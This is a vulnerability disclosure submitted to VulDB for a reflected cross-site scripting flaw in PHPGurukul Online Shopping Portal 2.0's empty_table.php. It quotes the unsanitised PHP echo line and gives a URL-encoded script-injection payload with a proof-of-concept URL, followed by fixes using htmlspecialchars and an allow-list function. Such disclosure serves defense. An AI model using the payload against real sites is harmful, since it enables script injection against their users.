
Submit #436377: PHPGurukul Online Shopping Portal 2.0 Improper Neutralization of Alternate XSS Syntax

Title: PHPGurukul Online Shopping Portal 2.0 Improper Neutralization of Alternate XSS Syntax

Description:

# [XSS vulnerability] found in Online Shopping Portal 2.0 - (empty_table.php)

- Affected Project: **Online Shopping Portal**
- Platform: Web/Php
- Vendor: PHPGurukul
- Official Website: https://phpgurukul.com/shopping-portal-free-download/
- Version: 2.0
- Updated: 06 June 2024
- Vulnerable path/file: admin/assets/plugins/DataTables/media/unit_testing/templates/empty_table.php
- Injection parameter: `scripts`
- Size: 30.5 MB
- Sha256: 127e719bf4236a9140f146dd7a6ae54f2a9234b9e6f0aeda240e7a4905c6e73c

## Vulnerability Description:

The issue arises in the `$aScripts[$i]` variable, which can be influenced by user input. The code echoes the constructed `<script>` tag directly into the HTML output and includes the user-controlled part within the `src` attribute without any sanitization. This allows an attacker to inject arbitrary HTML or JavaScript code, leading to an XSS attack.

## Vulnerable code:

```php
echo '<script type="text/javascript" language="javascript" src="../'.$aScripts[$i].'?rand='.rand().'"></script>';
```

## Injection Payload Tested:

We need to set the `scripts` parameter to a URL-encoded payload to make it work:

```
%22%3E%3C/script%3E%3Cscript%3Ealert('XSS')%3C/script%3E
```

## Execution:

When the browser parses this, it executes the injected `%22%3E%3C/script%3E%3Cscript%3Ealert('XSS')%3C/script%3E` code, resulting in a popup displaying `"XSS"`.

## Demonstration:

Below is what `empty_table.php` looks like:

https://i.postimg.cc/wMCcqwGJ/1.png

Then we can add our payload `%22%3E%3C/script%3E%3Cscript%3Ealert('XSS')%3C/script%3E`:

```
http://localhost/shopping/admin/assets/plugins/DataTables/media/unit_testing/templates/empty_table.php?scripts=%22%3E%3C/script%3E%3Cscript%3Ealert('XSS')%3C/script%3E
```

After submitting the URL with the payload `%22%3E%3C/script%3E%3Cscript%3Ealert('XSS')%3C/script%3E`, XSS is triggered:

https://i.postimg.cc/kMzkRqrN/2.png

## Recommendation for Preventing XSS:

To fix this vulnerability, we must always sanitize user inputs before rendering them in the HTML. We can use functions like `htmlspecialchars()` in PHP to encode special characters. Example:

```php
echo '<script type="text/javascript" language="javascript" src="../' . htmlspecialchars($aScripts[$i], ENT_QUOTES, 'UTF-8') . '?rand=' . rand() . '"></script>';
```

> One Click Can Change Everything: Be Secure.
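An added example (not the vendor's or DataTables' code) that goes one step beyond the recommendation above: `htmlspecialchars()` stops the value from breaking out of the `src` attribute, but the request still chooses which script path is loaded, so this version also validates each name against a strict pattern. It assumes `$aScripts` is built by splitting the `scripts` parameter on `:`, which the report does not show; `render_script_tags` is a hypothetical helper name.

```php
<?php
// Added example; not PHPGurukul or DataTables code.
// Assumption: $aScripts is the `scripts` query parameter split on ':'.

/** Build <script> tags only for names that pass a strict allow-list pattern. */
function render_script_tags(string $rawScripts): string
{
    $html = '';
    foreach (explode(':', $rawScripts) as $name) {
        // Relative path made of [A-Za-z0-9_-] directories and a *.js file name.
        $wellFormed = preg_match('#^(?:[A-Za-z0-9_-]+/)*[A-Za-z0-9_.-]+\.js\z#', $name) === 1;
        // Defence in depth: refuse any dot-dot sequence outright.
        if (!$wellFormed || strpos($name, '..') !== false) {
            continue; // drop anything that is not a plain script path
        }
        // Encode for the attribute context even though the pattern already
        // excludes quotes and angle brackets.
        $src = htmlspecialchars('../' . $name . '?rand=' . rand(), ENT_QUOTES, 'UTF-8');
        $html .= '<script type="text/javascript" language="javascript" src="' . $src . '"></script>' . "\n";
    }
    return $html;
}

// Constructed input: one legitimate name plus the decoded payload from the report.
$sample = 'tests/basic.js:"></script><script>alert(\'XSS\')</script>';
echo render_script_tags($sample); // emits a single tag, for tests/basic.js only
```

Since the affected file sits under `unit_testing/templates`, removing that directory from a deployed site is a further option alongside the code fix.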
Source: https://github.com/secuserx/CVE/blob/main/%5BXSS%20vulnerability%5D%20found%20in%20Online%20Shopping%20Portal%202.0%20-%20(empty_table.php).md
User: secuserx (UID 76735)
Submission: 02.11.2024 22:44 (3 months ago)
Moderation: 03.11.2024 08:06 (9 hours later)
Status: Accepted
VulDB Entry: 282924 [PHPGurukul Online Shopping Portal 2.0 empty_table.php scripts cross site scripting]
Points: 20
